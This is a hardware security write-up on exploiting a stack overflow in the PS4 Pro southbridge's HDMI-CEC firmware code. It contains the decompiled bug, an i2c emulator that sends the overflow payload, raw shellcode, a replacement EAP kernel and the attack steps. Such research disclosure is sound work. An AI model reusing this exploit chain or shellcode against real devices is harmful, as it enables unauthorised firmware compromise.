PS4 Aux Hax 4: Belize via CEC

This post describes another way to attain code execution on Aeolia (actually, the southbridge revision on PS4 Pro which was used in this case is named “Belize”).
This exploit differs from the previously documented method as it does not have the prerequisite of gaining control of the APU. Additionally, it is fairly generic and therefore workable on all currently released hardware and software versions of PS4.

From Aeolia to Belize

Previously, we have attained permanent code exec on the southbridge on the SAA-001 motherboard. This chip is marked as CXD90025G (referred to as Aeolia internally) and constitutes the first production version. As mentioned in previous posts in this series, there have been many revisions of the PS4, and it makes sense to assume more recent hardware includes more advanced security features. With the original Aeolia owned, it was possible to examine the EMC and EAP firmware and look for vulnerabilities which would allow a more direct attack on the successive hardware revisions. Specifically, the target was the southbridge on the most recent (at the time) PS4 Pro NVB-003 motherboard: marked CXD90046GG and named Belize. From reversing the Belize driver in the x86 FreeBSD kernel, it could be seen that the device was functionally mostly identical to Aeolia. For our purposes, “Aeolia” and “Belize” are interchangeable, so keep that in mind while reading this post.

Sidenote: NVB-003 contains a cost-reduced version of syscon, marked as A05-C0L2. This chip can be pwned exactly the same as the original version, so there will be no further post about that.

Common attack vectors

To bridge the gap between Aeolia and Belize, it is helpful to understand the execution flow on Aeolia, up to the point the “Rest Mode” kernel runs: While the EMC IPL and EAP KBL are both encrypted with keysets unique to each southbridge hardware revision and stored in sflash, the EAP FreeBSD kernel is stored on the hard drive and there exists only one version - meaning the key is shared between all hardware revisions. Since we can decrypt the entire boot chain used by the original Aeolia, we can recover the static keys used to encrypt and (HMAC) sign the FreeBSD kernel. By doing so and replacing the EAP kernel partition of the HDD, we easily gain EAP kernel code exec on any Aeolia or Belize southbridge revision.

While this is already quite nice, the goal is to get code exec on EMC. The EAP runs entirely from external DDR3 memory, while EMC executes only from internal SRAM. However, experimentation with Aeolia showed that EMC is actually capable of executing instructions out of the DDR3 as well. This massively simplifies generic exploitation of EMC since the address range of DDR3 is well known, and given EAP code exec, the content can be arbitrarily controlled. All that’s needed is a way to make EMC start executing instructions from DDR3 - the rest is simple.

To fulfill the wish of owning EMC without needing the APU to be compromised, other interactions between EMC firmware and external interfaces were checked for bugs. Surprisingly, a bug straight out of the 90s fell out during this investigation: a stack buffer overflow, with return address in range, and fully controlled contents. Even more amusingly, the bug is in the HDMI-CEC code, which makes this the first “real” CEC exploit I’m aware of, despite the numerous publications which have existed for some years already… (OK, technically the bug concerns CEC-over-i2c, but still!).

The bug

The vulnerability, as seen in the Aeolia firmware, is as follows:

int I2cRead(void *iface, unsigned int addr, u8 reg, void *dst, int len);

int getRecvMsg(cec_task_t *a1, void *a2) {
  return I2cRead(a1->i2c_iface, 0x7Au, 0x62u, a2, 1);
}

int cec_recv_msg(cec_task_t *a1, u8 *msg, unsigned int len) {
  unsigned int i; // r4
  int v7; // r0
  unsigned int j; // r4
  int dst; // [sp+4h] [bp-24h]

  v7 = 0;
  for (i = 0; i < len; i = (u8)(i + 1)) {
    v7 = I2cRead(a1->i2c_iface, 0x7Au, 0x61u, &dst, 1);
    if (v7) {
      print_nop("Cec Recv Err:%8lx\n", v7);
      return v7;
    }
    msg[i] = dst;
  }
  if (g_cec_log == 1) {
    ucmd_printf("[CEC] R:");
    for (j = 0; j < len; j = (u8)(j + 1)) {
      ucmd_printf("%2x", msg[j]);
    }
    ucmd_printf("\n");
  }
  return v7;
}

int doRecvInterruptEvent(cec_task_t *a1, int state) {
  int v4; // r0
  int v5; // r1
  const char *v6; // r0
  int mode; // r5
  int result; // r0
  int v9; // r0
  u8 msg[20]; // [sp+4h] [bp-34h]
  u8 len; // [sp+18h] [bp-20h]
  u8 total_msg_len; // [sp+1Ch] [bp-1Ch]

  bzero(msg, 0x14u);
  len = 0;
  total_msg_len = 0;
  v4 = cec_read_errcode(a1);
  v5 = v4;
  if (v4 && v4 != 15) {
    v6 = "_doRecvInterruptEvent,  err:%2x\n";
  } else {
    switch (state) {
      case 1:
        mode = 2;
        break;
      case 2:
      case 3:
        mode = 1;
        break;
      case 4:
      case 5:
        mode = 0;
        break;
      default:
        return -1;
    }
    v5 = getRecvMsg(a1, &total_msg_len);
    if (v5 || !total_msg_len) {
      v6 = "_getRecvMsg, Total Msg Len 0 or Err: 0x%8lx\n";
    } else {
      while (1) {
        print_nop("_getRecvMsg, Total Msg Len : 0x%2x\n", total_msg_len);
        v5 = I2cRead(a1->i2c_iface, 0x7Au, 0x63u, &len, 1);
        if (v5)
          goto LABEL_14;
        if (total_msg_len < (unsigned int)len)
          break;
        print_nop("_getRecvMsg, Msg Len : 0x%2x\n", len);
        //
        // XXX oops! length is up to 0xff here (both `total_msg_len` and `len`
        // are controlled). This will write off the end of `u8 msg[0x14]` with
        // data read directly from i2c.
        //
        v5 = cec_recv_msg(a1, msg, len);
        if (v5)
          goto LABEL_14;
        if (len && len <= 0x11u) {
          v9 = CecAn_analyzeMessage(a1->field_14, mode, msg, len);
          if (v9 == 1) {
            sendCecMsgReceiveEventNotify(a1, msg, len);
          } else if (v9 == 5) {
            cec_event_flg_set(a1, 1024);
          }
        } else {
          print_nop("CecCommEvent_InterruptReceiveMsg, len:0x%2x\n", len);
        }
        result = getRecvMsg(a1, &total_msg_len);
        if (result) {
          v5 = result;
LABEL_14:
          v6 = "_getRecvMsg, Reg Err : 0x%8lx\n";
          goto LABEL_18;
        }
        if (!total_msg_len)
          return result;
      }
      v5 = len;
      v6 = "_getRecvMsg, Err, msg_len : 0x%2x\n";
    }
  }
LABEL_18:
  print_nop(v6, v5);
  return -1;
}

While this seems nice and easy, reaching the code is a bit tricky:

  1. HDMI must be active, with CEC enabled.
  2. The code runs only in response to some interrupt being generated from the HDMI encoder.
  3. Boards with Belize have a different model of HDMI encoder than the original Aeolia. This could result in the bug being fixed accidentally, the code looking completely different, or even removed altogether.
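
To make the overflow in doRecvInterruptEvent concrete, here is a minimal host-side sketch in C that models the function's frame as a flat byte array. The offsets of `msg`, `len` and `total_msg_len` come from the decompiler annotations in the listing (bp-0x34, bp-0x20, bp-0x1C). Everything else is an assumption: that the 0x18 bytes between the locals and bp hold the saved registers and return address, and the names `frame_model_t`, `model_cec_recv` and `bytes_past_frame`, which are hypothetical. The exact return-address slot is not stated in the post.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Offsets relative to the start of msg[], derived from the decompiler
 * annotations: msg @ bp-0x34, len @ bp-0x20, total_msg_len @ bp-0x1C. */
enum {
    OFF_MSG           = 0x00,
    OFF_LEN           = 0x34 - 0x20, /* 0x14: first byte past msg[20] */
    OFF_TOTAL_MSG_LEN = 0x34 - 0x1C, /* 0x18 */
    OFF_LOCALS_END    = 0x34 - 0x18, /* 0x1C: assumed start of saved regs */
    OFF_FRAME_END     = 0x34,        /* bp itself (assumption) */
    MODEL_SIZE        = 0x100        /* large enough for any u8 length */
};

typedef struct {
    uint8_t bytes[MODEL_SIZE];
} frame_model_t;

/* Models cec_recv_msg(): copies `len` bytes from the "i2c FIFO" into msg
 * with no bound check, like the firmware loop. The model array is big
 * enough that this stays in bounds on the host. */
static void model_cec_recv(frame_model_t *f, const uint8_t *fifo, uint8_t len) {
    for (unsigned i = 0; i < len; i++) {
        f->bytes[OFF_MSG + i] = fifo[i];
    }
}

/* How many bytes land beyond the modeled frame (locals plus the assumed
 * saved-register area); 0 if the write stays inside it. */
static unsigned bytes_past_frame(uint8_t len) {
    return len > OFF_FRAME_END ? (unsigned)len - OFF_FRAME_END : 0;
}

/* Little-endian 32-bit read at a byte offset in the model. */
static uint32_t read_u32(const frame_model_t *f, unsigned off) {
    assert(off + 4 <= MODEL_SIZE);
    return (uint32_t)f->bytes[off]
         | (uint32_t)f->bytes[off + 1] << 8
         | (uint32_t)f->bytes[off + 2] << 16
         | (uint32_t)f->bytes[off + 3] << 24;
}
```

Feeding this model a 0x60-byte message of 0x61 bytes overwrites `len`, `total_msg_len` and every word up to bp, which is why the exact position of the saved return address does not need to be known. Note that `len <= 0x11` is only checked after cec_recv_msg has already written the data.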

Reaching the bug

The first condition required for the code path to be reachable is that HDMI-CEC is enabled and active. While it is possible to force this condition using icc commands from EAP to EMC, it is much simpler (in that it doesn’t require writing any code) to just boot the APU and ensure [Enable HDMI Device Link] is enabled in the settings. The APU needs to be cycled in any case in order to start Rest Mode - which will execute our custom EAP kernel.

Dealing with i2c

The second and third issues were resolved in the process of creating a way to talk with the CEC interface of Belize.

The original idea was to man-in-the-middle the i2c by corrupting the address bits as they were shifted out of Belize (which would cause the HDMI encoder to not recognize it was the targeted device), and then handle the data transfer with my own device. However this wound up not working. As it turns out, the i2c interface of EMC is built to detect such contention and will immediately stop driving the bus. This wasn’t completely unexpected - to work around it, I just found the power switch used by syscon to control the HDMI encoder and forcibly disabled it whenever I wanted to take over the bus. This is not as clean - it requires rebooting the HDMI encoder and Belize to recover sanity - but hey, it works.
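
The contention behavior is consistent with ordinary I2C arbitration on an open-drain bus: a device can only pull SDA low, so corrupting an address means turning a 1 into a 0, and that is exactly the case a master checks for. The following C sketch simulates this, assuming the EMC controller follows standard arbitration rules (the post does not describe the actual hardware logic). The function names are hypothetical, and 0x7A is simply the address byte seen in the Aeolia listing.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

/* Open-drain bus: the line is high only if nobody pulls it low. */
static bool sda_level(bool master_releases, bool attacker_releases) {
    return master_releases && attacker_releases;
}

/* Shifts out an address byte (7-bit address plus R/W bit) MSB first while
 * an attacker pulls SDA low on the bit positions set in `pull_low_mask`.
 * Returns the index (0 = first bit on the wire) of the first bit where
 * the master reads back a level other than the one it sent, or -1 if it
 * never notices anything. */
static int first_arbitration_loss(uint8_t addr_byte, uint8_t pull_low_mask) {
    for (int bit = 0; bit < 8; bit++) {
        uint8_t m = (uint8_t)(0x80u >> bit);
        bool master_releases   = (addr_byte & m) != 0;     /* sending a 1 */
        bool attacker_releases = (pull_low_mask & m) == 0; /* not pulling */
        bool seen = sda_level(master_releases, attacker_releases);
        if (seen != master_releases) {
            return bit; /* sent 1, saw 0: the master backs off here */
        }
    }
    return -1;
}
```

Pulling low on a bit the master already drives low changes nothing on the wire, so the only corruptions that alter the address are also the ones the master can detect.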

As mentioned, the vulnerable code is run in response to a certain interrupt event. By probing i2c and pulling down various nearby pins of the HDMI encoder, it was easy to determine that there is a dedicated trace for the general interrupt event. When responding to this event, the EMC firmware will read some registers of the HDMI encoder in order to discover the pending interrupts. Eventually, the buggy code will be invoked if the proper interrupt is pending (it’s named HDMI_INTRID_CECRX).

By comparing logic analyzer traces of the HDMI encoder used by original Aeolia (Panasonic MN86471A) to that used by Belize (Panasonic MN864729), it could be seen that the register layout had changed slightly, but it was a simple matter to determine the registers and values required to mount the attack in the Belize/MN864729 environment. A quick test to try crashing EMC via a too-long CEC buffer worked, so issue #3 was taken care of as well.

Hardware setup

For Belize, the setup looks like:

Exploitation

On the device simulating the HDMI encoder, the following code is run. This is a simple state machine which serves only to redirect EMC’s program counter to 0x61616161. This address was chosen just in case there is some unknown misalignment going on - no matter which offset the return address is read from, it will always point to 0x61616161 (which is in EMC’s view of DDR3).

struct DevEmu {
    void StartCondition();
    u8 Read(u8 addr);
    void Write(u8 addr, u8 val);
    u8 dev10_regf2{};
    u8 irq_status{};
    u8 irq_mask{};
    u8 msg_buf[0xfe]{};
    u8 msg_pos{};
    u8 msg_len{};
    u8 reg{};
    size_t pos{};
    std::function<void(bool)> set_irq;
};

void DevEmu::StartCondition() {
    pos = 0;
}

// Note: this only simulates MN864729
u8 DevEmu::Read(u8 addr) {
    size_t pos_ = pos++;
    switch (addr) {
    case 0x10:
        // irq stuff
        switch (reg) {
        case 0xf2: return dev10_regf2;
        case 0xf4: return 0xa0;
        // hdmi irq 18 is 0x10
        case 0xf7: return irq_status;
        case 0xfa: return 0x0f;
        case 0xfc: return 0x50;
        case 0xff: return irq_mask;
        }
        // unknown register: don't fall through into the CEC (0x80) case
        break;
    case 0x80:
        // cec buffers
        switch (reg) {
        // rx fifo
        case 0x61: {
            // guard the read: msg_pos can reach sizeof(msg_buf)
            u8 val = msg_pos < sizeof(msg_buf) ? msg_buf[msg_pos] : 0;
            if (pos_ == 0 && msg_pos < sizeof(msg_buf)) {
                // ignore over-read generated by fpga
                msg_pos++;
            }
            return val;
        }
        // total msg len
        case 0x62: return msg_len - msg_pos;
        // msg len
        case 0x63: return msg_len - msg_pos;
        // error code
        case 0x69: return 0;
        }
    }
    return 0;
}

void DevEmu::Write(u8 addr, u8 val) {
    size_t pos_ = pos++;
    if (pos_ == 0) {
        reg = val;
        return;
    }
    switch (addr) {
    case 0x10:
        switch (reg) {
        case 0xf2:
            dev10_regf2 &= ~val;
            break;
        case 0xf7:
            irq_status &= ~val;
            set_irq(irq_status & 0x10);
            break;
        }
    }
}

void CecHax::Enable(bool enable) {
    if (enable) {
        // Disable power to real HDMI encoder
        gpio.Set(Gpio::kLow);
        // Enable our hardware
        csrs.Write(i2c_enable, 1);
        // Trigger IRQ to EMC
        csrs.Write(irq_n, 0);
    } else {
        csrs.Write(irq_n, 1);
        csrs.Write(i2c_enable, 0);
        //gpio.Set(Gpio::kHigh);
    }
}

bool CecHax::HasError() {
    CSRValue err;
    csrs.Read(i2c_error, &err);
    return err != 0;
}

void CecHax::Run() {
    dev_emu.set_irq = [this](bool enable) {
        csrs.Write(irq_n, enable ? 0 : 1);
    };
    dev_emu.dev10_regf2 = 0x62;
    dev_emu.irq_status = 0b00010000;
    dev_emu.irq_mask   = 0b11010000;
    dev_emu.msg_len = 0x60;

    auto p = (u32 *)dev_emu.msg_buf;
    for (size_t i = 0; i < dev_emu.msg_len / sizeof(u32); i++) {
        *p++ = 0x61616160|1;
    }

    Enable(true);
    while (!HasError()) {
        CSRValue val;
        csrs.Read(i2c_event, &val);
        if (val & kStart) {
            dev_emu.StartCondition();
            csrs.Write(i2c_event_clr, 1);
        }
        if (val & kHolding) {
            CSRValue addr;
            csrs.Read(i2c_cur_addr, &addr);
            bool is_read = addr & 1;
            addr &= ~1;
            if (is_read) {
                // read - send byte
                val = dev_emu.Read(addr);
                csrs.Write(i2c_dout, val);
            } else {
                // write - recv byte
                csrs.Read(i2c_din, &val);
                dev_emu.Write(addr, val);
            }
            csrs.Write(i2c_event_clr, 1);
            // pos is a size_t, so print it with %zx
            printf("%02x:%c.%zx %02x\n", addr, is_read ? 'r' : 'w',
                dev_emu.pos, val);
        }
    }
    Enable(false);
}
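
The choice of payload word can be checked with a few lines of host-side C. This is a small sketch, not part of the original tooling: it fills a buffer the way CecHax::Run does and verifies that every 4-byte window, aligned or not, decodes to the same value. The helper names are hypothetical. The last function reflects the general ARM rule that bit 0 of a branch target selects Thumb state, which matches the `0x61616160|1` in the payload.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Fills buf with repeated little-endian copies of `word`. */
static void fill_pattern(uint8_t *buf, size_t len, uint32_t word) {
    assert(len % 4 == 0);
    for (size_t i = 0; i < len; i++) {
        buf[i] = (uint8_t)(word >> (8 * (i % 4)));
    }
}

/* Little-endian 32-bit load from an arbitrary byte offset. */
static uint32_t load_le32(const uint8_t *buf, size_t off) {
    return (uint32_t)buf[off]
         | (uint32_t)buf[off + 1] << 8
         | (uint32_t)buf[off + 2] << 16
         | (uint32_t)buf[off + 3] << 24;
}

/* Returns 1 if every 4-byte window in buf decodes to `word`. */
static int pattern_is_offset_independent(const uint8_t *buf, size_t len,
                                         uint32_t word) {
    for (size_t off = 0; off + 4 <= len; off++) {
        if (load_le32(buf, off) != word) {
            return 0;
        }
    }
    return 1;
}

/* Address the core fetches from when it branches to a Thumb target. */
static uint32_t thumb_fetch_address(uint32_t target) {
    return target & ~1u;
}
```

A word with four identical bytes passes the check, while something like 0x61626364 would only be read back correctly at 4-byte-aligned offsets.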

The following code replaces the entire EAP kernel. The emc_shellcode section will be loaded to the desired address (which EMC will return to) in DDR3 by the ELF loader in EAP KBL. All the EAP code does is wait for EMC to execute the dumper shellcode, then repeatedly spew the result out of UART.

/*
arm-none-eabi-gcc -std=gnu11 -nostdlib -T eap_kernel.ld -o eap_kernel eap_kernel.c
arm-none-eabi-strip --strip-unneeded eap_kernel
*/
typedef unsigned char u8;
typedef unsigned int u32;
typedef volatile u32 vu32;
typedef u32 size_t;

// used by emc ucmd
#define EAP_UART0_BASE 0xBF240000
// uart1 is port x86 soc uses too
#define EAP_UART1_BASE 0xBF340000
#define EAP_DDR3_BASE 0xc0000000
#define EAP_SHARED_BUF (EAP_DDR3_BASE + 0x01000000)
#define EMC_DUMP_START 0x100000
#define EMC_DUMP_END 0x160000
#define EMC_DUMP_LEN (EMC_DUMP_END - EMC_DUMP_START)

static void uart_write_byte(u8 val) {
    vu32 *dat    = (vu32 *)(EAP_UART1_BASE + 0x00);
    vu32 *status = (vu32 *)(EAP_UART1_BASE + 0x14);
    while (!(*status & 0x40));
    *dat = val;
}

static void uart_write_str(const char *str) {
    while (*str) {
        uart_write_byte(*str++);
    }
}

static void hexdump(const void *buf, size_t len) {
    const u8 *p = buf;
    const char *lut = "0123456789abcdef";
    for (size_t i = 0; i < len; i++) {
        if (i > 0 && (i & 0xf) == 0) {
            uart_write_byte('\n');
        }
        u8 val = p[i];
        uart_write_byte(lut[val >> 4]);
        uart_write_byte(lut[val & 0xf]);
    }
}

// EMC code
// EAP 0xc0000000 = 0x60000000 in EMC space
// Will be placed by elf loader (eap_kbl)
static const u8 dumper[] __attribute__((section("emc_shellcode"))) = {
    0x5F, 0xF4, 0x80, 0x10, 0x40, 0xF2, 0x00, 0x01,
    0xC6, 0xF2, 0x00, 0x11, 0x40, 0xF2, 0x00, 0x02,
    0xC0, 0xF2, 0x16, 0x02, 0x03, 0x68, 0x0B, 0x60,
    0x04, 0x30, 0x04, 0x31, 0x90, 0x42, 0xF9, 0xD1,
    0x40, 0xF2, 0x00, 0x00, 0xC6, 0xF2, 0x00, 0x10,
    0x4C, 0xF2, 0xDE, 0x01, 0xC1, 0xF2, 0x37, 0x31,
    0x40, 0xF8, 0x04, 0x1C, 0xFE, 0xE7
};

// SCTLR &= ~(I|C|M)
static void disable_caches_and_mmu() {
    asm volatile(
        "mrc     p15, 0, r6, c1, c0, 0;"
        "bic     r6, r6, #0x1000;"
        "bic     r6, r6, #4;"
        "bic     r6, r6, #1;"
        "mcr     p15, 0, r6, c1, c0, 0;"
        :
        :
        : "r6"
    );
}

// (old) gcc is really dumb, must define arm->thumb target like so
typedef void (*icc_watchdog_stop_wdt_t)();
static const icc_watchdog_stop_wdt_t icc_watchdog_stop_wdt =
    (icc_watchdog_stop_wdt_t)(0xC0010880|1);

void _start() {
    uart_write_str("go\n");
    
    icc_watchdog_stop_wdt();
    disable_caches_and_mmu();

    vu32 *shared_buf = (vu32 *)EAP_SHARED_BUF;
    vu32 *magic = &shared_buf[-1];
    *magic = 0;
    uart_write_str("EAP running\n");
    while (*magic == 0);
    for (size_t i = 0; i < 10000; i++) {
        uart_write_str("\ndump:\n");
        hexdump((void *)EAP_SHARED_BUF, EMC_DUMP_LEN);
    }
    while (1);
}
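
For readers who would rather not disassemble the `dumper` bytes by hand: decoded as Thumb-2, they appear to copy 32-bit words from 0x100000 up to 0x160000 into 0x61000000 (EAP_SHARED_BUF as seen from EMC), store 0x1337C0DE in the word just below that buffer, and then spin. The C below is a host-side model of that reading of the disassembly, not the original source of the shellcode. It takes pointers instead of the fixed addresses so it can run on a PC, and the function and macro names are hypothetical.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define EMC_DUMP_START  0x00100000u /* r0: first address copied */
#define EMC_DUMP_END    0x00160000u /* r2: copy stops here */
#define EMC_SHARED_BUF  0x61000000u /* r1: EAP_SHARED_BUF in EMC space */
#define DUMP_DONE_MAGIC 0x1337C0DEu /* stored at EMC_SHARED_BUF - 4 */

/* Host-side model of the copy loop. `src` stands in for the EMC memory at
 * EMC_DUMP_START, `dst` for the shared buffer and `magic` for the word
 * just below it. On hardware the shellcode then loops forever (b .). */
static void emc_dumper_model(const volatile uint32_t *src,
                             volatile uint32_t *dst, size_t nwords,
                             volatile uint32_t *magic) {
    for (size_t i = 0; i < nwords; i++) {
        dst[i] = src[i];      /* ldr r3,[r0]; str r3,[r1]; both += 4 */
    }
    *magic = DUMP_DONE_MAGIC; /* str r1,[r0,#-4] with r0 = shared buf */
}

/* Number of 32-bit words the real shellcode copies. */
static size_t emc_dump_words(void) {
    return (EMC_DUMP_END - EMC_DUMP_START) / sizeof(uint32_t);
}
```

The magic word is what `_start` polls through `shared_buf[-1]`: the EAP side clears it, waits for it to become nonzero, and only then starts hexdumping the buffer.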

And the related linker script:

ENTRY(_start)
SECTIONS {
    eap 0xc0100000 : {
        *(.text*)
        *(.rodata*)
    }
    emc 0x61616160 + 0x60000000 : {
        *(emc_shellcode)
    }
    /DISCARD/ : { *(*) }
}
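
The `emc` section address is just the return target translated from EMC's view of DDR3 into EAP's view. A minimal sketch of that translation in C, using the two base addresses given in the kernel source and the shellcode comment, and assuming the mapping is linear across the whole window (the helper names are hypothetical):

```c
#include <assert.h>
#include <stdint.h>

#define EAP_DDR3_BASE 0xC0000000u /* from the EAP kernel source */
#define EMC_DDR3_BASE 0x60000000u /* from the shellcode comment */

/* Translates an address in EMC's view of DDR3 to EAP's view. */
static uint32_t emc_to_eap(uint32_t emc_addr) {
    assert(emc_addr >= EMC_DDR3_BASE);
    return emc_addr - EMC_DDR3_BASE + EAP_DDR3_BASE;
}

/* Translates an address in EAP's view of DDR3 to EMC's view. */
static uint32_t eap_to_emc(uint32_t eap_addr) {
    assert(eap_addr >= EAP_DDR3_BASE);
    return eap_addr - EAP_DDR3_BASE + EMC_DDR3_BASE;
}
```

With these, `emc_to_eap(0x61616160)` gives 0xC1616160, the same value as the `0x61616160 + 0x60000000` expression in the linker script, and `eap_to_emc(0xC1000000)` gives the 0x61000000 destination used by the shellcode.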

So, the overall process is like:

  1. Tap onto CEC-related i2c and irq lines and HDMI encoder power switch
  2. Power up PS4 and enter Rest Mode
  3. Wait for “EAP running” message from custom EAP kernel
  4. Induce the CEC RX interrupt
  5. Feed data to EMC such that it causes a stack buffer overflow
  6. Wait for EMC to copy SRAM to DDR3
  7. Dump copied SRAM out of UART

Of course, this is really EMC code exec, so the dumping is just something to do after the fact :)

Parting thoughts

This post outlines a way to dump EMC firmware and gain EMC code exec on any hardware revision. While the real root keys (in fuses and ROM) of EMC versions besides the first are still unknown, they could yet be recovered with side channel attacks, if someone really wanted them. Since this method is much simpler and more generic, it stands on its own as an interesting exploit.

As was hinted at, the CXD90046GG version of EMC employs slightly better security practices. The EMC ROM now wipes the SRAM space used as stack during initial key derivation, and some as-of-yet unknown method is used to unmap the ROM, mitigating it being dumped simply by reading from address 0x00000000. Again, it is likely the key material could still be recovered - if someone cares - but it’s interesting to see that such changes made their way into hardware between revisions.